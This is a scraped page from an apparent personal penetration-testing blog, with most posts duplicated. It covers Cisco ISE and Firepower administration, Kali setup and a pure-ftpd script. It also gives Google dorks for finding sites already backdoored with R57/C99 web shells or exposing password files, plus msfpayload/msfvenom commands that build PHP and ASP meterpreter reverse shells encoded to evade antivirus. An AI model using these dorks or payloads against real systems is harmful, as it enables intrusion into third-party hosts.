Thank you Google for operands, and spyders that crawl the IOT. It never stops to amaze me how web shells that have been around for what seems like for ever are still around on websites today. Below are some of my favorite google dorks.
Want to find systems that have been compromised and have the R57 or C99 webshells in their directories. Look no further.
intitle: "r57" "disable functions"
inurl:sh3llZ/c99/
This is fun! Locate file vulnerabilities. It reveals the password directory.
inurl:access.cnf ext:cnf
You can find these and a lot more in the GHDB.
A place to put my thoughts, and lessons learned in securing the internet of things.
Tuesday, December 22, 2015
Wednesday, March 11, 2015
Cisco ISE root access
First let me start with a disclaimer. If you do not what your doing then please stop what your doing.
Ok, so now that that is out of the way, on to the good stuff. Cisco ISE is built on top of Linux. It has a backend linux shell which is based on bash shell. It uses an oracle database. For the most part you should never need to gain access to the root shell. The only way to get root access is to get a file from Cisco TAC called TACtshootx64.tar.gz. The file name maybe slightly different based what version of ISE you are using. In my past experience I have only installed this file when Cisco TAC asked me to.
Effectively, the file gives you root access which can be obtained by executing the below.
1 Put the file in your repo.
2 Install the application using the command
application install TACtshootx64.tar.g [repo name]
3 Now to get root access;
tac root-access
You should notice that your prompt will change from
hostname/username# to [root@hostname localdisk]#
Now you are root user and can do all the functions of any other linux root user
For example ps -ef will show you what is running on the system under what user.
You can shut the ISE node down by typing shutdown -h now
If you know Oracle DB commands you can edit the databse that ISE runs on. Be very careful when modifying the DB. There are many links to many tables, and if you break it, you may just break ISE. Those tasks might be better left to senior level TAC support reps.
If your goal is simply to shutdown an ISE node, that can be done by logging into the node as admin or as a user that has the administrator role, and typing the command:
hostname/username#halt
Ok, so now that that is out of the way, on to the good stuff. Cisco ISE is built on top of Linux. It has a backend linux shell which is based on bash shell. It uses an oracle database. For the most part you should never need to gain access to the root shell. The only way to get root access is to get a file from Cisco TAC called TACtshootx64.tar.gz. The file name maybe slightly different based what version of ISE you are using. In my past experience I have only installed this file when Cisco TAC asked me to.
Effectively, the file gives you root access which can be obtained by executing the below.
1 Put the file in your repo.
2 Install the application using the command
application install TACtshootx64.tar.g [repo name]
3 Now to get root access;
tac root-access
You should notice that your prompt will change from
hostname/username# to [root@hostname localdisk]#
Now you are root user and can do all the functions of any other linux root user
For example ps -ef will show you what is running on the system under what user.
You can shut the ISE node down by typing shutdown -h now
If you know Oracle DB commands you can edit the databse that ISE runs on. Be very careful when modifying the DB. There are many links to many tables, and if you break it, you may just break ISE. Those tasks might be better left to senior level TAC support reps.
If your goal is simply to shutdown an ISE node, that can be done by logging into the node as admin or as a user that has the administrator role, and typing the command:
hostname/username#halt
Monday, March 2, 2015
Creating Shells with msfpayload, and msfvenom
msfpayload is a metasploit utility to create shell code. The shell code is used to exploit targets. These exploits can be used to create bind, and reverse shells. When coupled with msfencode, they can also be used to obsfucate the signature of the file to help avoid detection with antivirus, remove bad characters(null bytes), inject shell code into executables, and several other tasks. Below are a few examples on how to create shell code using msfpayload, as well as msfencode.
#Create a php reverse tcp meterpreter
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 R >evil.php
#Create asp file using reverse tcp meterpreter
msfpayload -p windows/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 R | msfencode -o rmetshell443.asp
In both of the above examples, when the victim opens the exploit, it will attempt to establish a reverse shell by connecting to 192.168.10.146 on tcp port 443.
For more information on both of these commands check out.
http://www.offensive-security.com/metasploit-unleashed/Msfencode
The makers of metsploit in all of their absolute brilliance have made this even easier in a tool called msfvenom. Msfvenom is combination of both msfpayload, and msfencode.
# This command will create a reverse shell, remove null characters \x00, and # encode the file as ASP.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 -e x86/shikata_ga_nai -b "\x00"-f asp >rmetshell443.asp
#Create a php reverse tcp meterpreter
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 R >evil.php
#Create asp file using reverse tcp meterpreter
msfpayload -p windows/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 R | msfencode -o rmetshell443.asp
In both of the above examples, when the victim opens the exploit, it will attempt to establish a reverse shell by connecting to 192.168.10.146 on tcp port 443.
For more information on both of these commands check out.
http://www.offensive-security.com/metasploit-unleashed/Msfencode
The makers of metsploit in all of their absolute brilliance have made this even easier in a tool called msfvenom. Msfvenom is combination of both msfpayload, and msfencode.
# This command will create a reverse shell, remove null characters \x00, and # encode the file as ASP.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 -e x86/shikata_ga_nai -b "\x00"-f asp >rmetshell443.asp
Wednesday, February 25, 2015
Do you KDE?
I am not a fan of gnome, I do like the look and feel of KDE. Switching your desktop in Kali linux is pretty easy. You have a couple options when it comes to using custom desktops in Kali. The first option is stay with the default Gnome, the second option is login with Gnome after install and then install your favorite desktop, The final option is build a custom iso.
Option 2 is pretty easy and the one that I use.
So install Kali, login as root with the password you made during the install.
I saw a great movie with my wife last night, the internship, and in the words of Vince Vaughn. You will have to setup your wireless or wired connection, and make sure your "on the line" first.
open a terminal, and get on with it.
apt-get update && apt-get install kali-defaults kali-root-login desktop-base kde-plasma-desktop
If you are interested in installing other desktops checkout the link below.
http://docs.kali.org/live-build/customize-the-kali-desktop-environment
Option 2 is pretty easy and the one that I use.
So install Kali, login as root with the password you made during the install.
I saw a great movie with my wife last night, the internship, and in the words of Vince Vaughn. You will have to setup your wireless or wired connection, and make sure your "on the line" first.
open a terminal, and get on with it.
apt-get update && apt-get install kali-defaults kali-root-login desktop-base kde-plasma-desktop
If you are interested in installing other desktops checkout the link below.
http://docs.kali.org/live-build/customize-the-kali-desktop-environment
Troubleshooting Firepower
Capturing packets
Step 1 - Log into the sfr module via ssh
Step 2 - Execute the command:
system support capture-traffic
Step3
Choose option 2 to capture data from from Single Context
Please choose domain to capture traffic from:
0 - eth0
1 - cplane
2 - Single Context
Selection? 2
Step 4 - Specify your options on what to capture
Please specify tcpdump options desired.
(or enter '?' for a list of supported options)
Options: -n host (ip address of 1st host) and host (ip address of 2nd host)
The above capture option will perform a packet capture of all data between the specified two hosts.
Resetting snort
Login to the sfr module using the admin credentials.
Enter the root shell by entering expert mode:
expert
Enter your admin credentials
Elevate to root permissions
sudo su -
Enter your Admin credntials
pmtool restartbyid SFDataCorrelator
pmtool restartbytype snort
Finding the pid of a service.
pidof snort
Display logging information for traffic traversing the sfr
> system support firewall-engine-debug
Step 1 - Log into the sfr module via ssh
Step 2 - Execute the command:
system support capture-traffic
Step3
Choose option 2 to capture data from from Single Context
Please choose domain to capture traffic from:
0 - eth0
1 - cplane
2 - Single Context
Selection? 2
Step 4 - Specify your options on what to capture
Please specify tcpdump options desired.
(or enter '?' for a list of supported options)
Options: -n host (ip address of 1st host) and host (ip address of 2nd host)
The above capture option will perform a packet capture of all data between the specified two hosts.
Resetting snort
Login to the sfr module using the admin credentials.
Enter the root shell by entering expert mode:
expert
Enter your admin credentials
Elevate to root permissions
sudo su -
Enter your Admin credntials
pmtool restartbyid SFDataCorrelator
pmtool restartbytype snort
Finding the pid of a service.
pidof snort
Display logging information for traffic traversing the sfr
> system support firewall-engine-debug
Monday, February 23, 2015
Configuring things after kali is installed
After you complete the installation of kali linux, there are few things that need to be completed as post install tasks. Below is part 1 of many steps I execute as part of my post setup tasks. There is no real order to any of this, and I am writing it as I think of them.
1 Upgrade the distro to make sure you have the latest install.
1 Upgrade the distro to make sure you have the latest install.
apt-get update && apt-get dist-upgrade |
2 Install kernel headers and virtualbox
apt-get install linux-headers-$(uname -r) dkms virtualbox |
3 Install Pureftpd. This is not really required. It is just another option to use to upload stuff during penetration tests.
apt-get install pure-ftpd |
4 This is a script I worked on while doing my OCSP. It will automagically configure Pure-FTPD.
#!/bin/bash
# bash script to setup and configure pure-ftpd server
echo "[*] Creating ftpgroup and ftpuser [*]\n"
groupadd ftpgroup
useradd -g ftpgroup -d /home/dir -s /dev/null ftpuser
echo "[*] Configuring ftpuser kryptonite [*]\n"
pure-pw useradd kryptonite -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
echo "[*] Setting home directory to /ftphome/ [*]\n"
mkdir /ftphome
echo "[*] Setting permissions on home directory [*]\n"
chown -R ftpuser:ftpgroup /ftphome/
echo "[*] Setup Complete Restarting Server [*]\n"
service pure-ftpd restart
# bash script to setup and configure pure-ftpd server
echo "[*] Creating ftpgroup and ftpuser [*]\n"
groupadd ftpgroup
useradd -g ftpgroup -d /home/dir -s /dev/null ftpuser
echo "[*] Configuring ftpuser kryptonite [*]\n"
pure-pw useradd kryptonite -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
echo "[*] Setting home directory to /ftphome/ [*]\n"
mkdir /ftphome
echo "[*] Setting permissions on home directory [*]\n"
chown -R ftpuser:ftpgroup /ftphome/
echo "[*] Setup Complete Restarting Server [*]\n"
service pure-ftpd restart
Subscribe to:
Posts (Atom)